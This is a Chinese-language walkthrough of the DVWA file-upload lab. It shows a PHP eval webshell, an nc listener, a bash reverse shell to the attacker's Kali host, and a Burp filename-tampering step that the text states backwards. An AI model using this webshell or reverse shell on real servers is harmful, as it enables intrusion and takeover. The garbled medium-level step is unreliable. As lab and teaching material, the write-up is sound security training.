Environment victim:CentOS 7.6 with DVWA(IP:192.168.0.250)
victim無配置iptables rules.
Security Level:Low 在Security Level為Low時,file upload可上傳任何檔案,因此上傳包含一句話木馬 的php檔至伺服器。
Security Level = low,source code
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 <?php if( isset( $_POST[ 'Upload' ] ) ) { // Where are we going to be writing to? $target_path = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/"; $target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] ); // Can we move the file to the upload folder? if( !move_uploaded_file( $_FILES[ 'uploaded' ][ 'tmp_name' ], $target_path ) ) { // No echo '<pre>Your image was not uploaded.</pre>'; } else { // Yes! echo "<pre>{$target_path} succesfully uploaded!</pre>"; } } ?>
in Hack.php
1 <?php @eval($_POST['pass']);?>
Altman Altman為一跨平台webshell程式,可在macOS、Linux、Windows等系統上執行使用。apache。interactive shell 的方式與victim進行互動。
1 2 nc -lvp 2333 #此套件為netcat listening on [any] 2333
在Altman下指令連接至Kali Linux以port 2333進行連接:
1 bash -i >& /dev/tcp/192.168.0.128/2333 0>&1
在Kali Linux的Terminal可以發現連線成功並以interactive shell,而可以直接切換至root。
Security Level:Medium 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 <?php if( isset( $_POST[ 'Upload' ] ) ) { // Where are we going to be writing to? $target_path = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/"; $target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] ); // File information $uploaded_name = $_FILES[ 'uploaded' ][ 'name' ]; $uploaded_type = $_FILES[ 'uploaded' ][ 'type' ]; $uploaded_size = $_FILES[ 'uploaded' ][ 'size' ]; // Is it an image? if( ( $uploaded_type == "image/jpeg" || $uploaded_type == "image/png" ) && ( $uploaded_size < 100000 ) ) { // Can we move the file to the upload folder? if( !move_uploaded_file( $_FILES[ 'uploaded' ][ 'tmp_name' ], $target_path ) ) { // No echo '<pre>Your image was not uploaded.</pre>'; } else { // Yes! echo "<pre>{$target_path} succesfully uploaded!</pre>"; } } else { // Invalid file echo '<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>'; } } ?>
從Source code發現,此層級只允許上傳jpg以及png類型的檔案,並且大小為100KB以下。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 因此須將一句話木馬以jpg/png為副檔名來上傳,再使用Burp Suite擷取封包並且從中更改副檔名。Burp Suite以proxy的方式進行運作,所以瀏覽器需要設定proxy,預設port為8080。  將intercept切換為on,使Burp Suite接收封包。  在Content-Disposition中,將```filename="hack-medium.php"```更改為```filename="hack-medium.png"```,如此伺服器接收到的仍是PNG類型,但實際存放時的檔案類型為php。 之後執行webshell以及提權方法皆與security level=low時一樣。 ## Security Level:High ```<?php <?php if( isset( $_POST[ 'Upload' ] ) ) { // Where are we going to be writing to? $target_path = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/"; $target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] ); // File information $uploaded_name = $_FILES[ 'uploaded' ][ 'name' ]; $uploaded_ext = substr( $uploaded_name, strrpos( $uploaded_name, '.' ) + 1); $uploaded_size = $_FILES[ 'uploaded' ][ 'size' ]; $uploaded_tmp = $_FILES[ 'uploaded' ][ 'tmp_name' ]; // Is it an image? if( ( strtolower( $uploaded_ext ) == "jpg" || strtolower( $uploaded_ext ) == "jpeg" || strtolower( $uploaded_ext ) == "png" ) && ( $uploaded_size < 100000 ) && getimagesize( $uploaded_tmp ) ) { // Can we move the file to the upload folder? if( !move_uploaded_file( $uploaded_tmp, $target_path ) ) { // No echo '<pre>Your image was not uploaded.</pre>'; } else { // Yes! echo "<pre>{$target_path} succesfully uploaded!</pre>"; } } else { // Invalid file echo '<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>'; } } ?>
strrpos()函數為尋找指定字串最後出現的位置。
substr( $uploaded_name, strrpos( $uploaded_name, '.' ) + 1);首先取得'.'最後出現的位置後再+1,以此數值使用substr函數取得該位置起始的字串。$uploaded_ext會是一個為副檔名的字串(like ‘jpg’)。
getimagesize()此函數將取得圖像的大小與相關訊息。Array ( [0] => 105 [1] => 60 [2] => 3 [3] => width="105" height="60" [bits] => 8 [mime] => image/png )
Reference Linux 反弹shell(二)反弹shell的本质 Linux提权思路+实战 记一次曲折的Linux提权
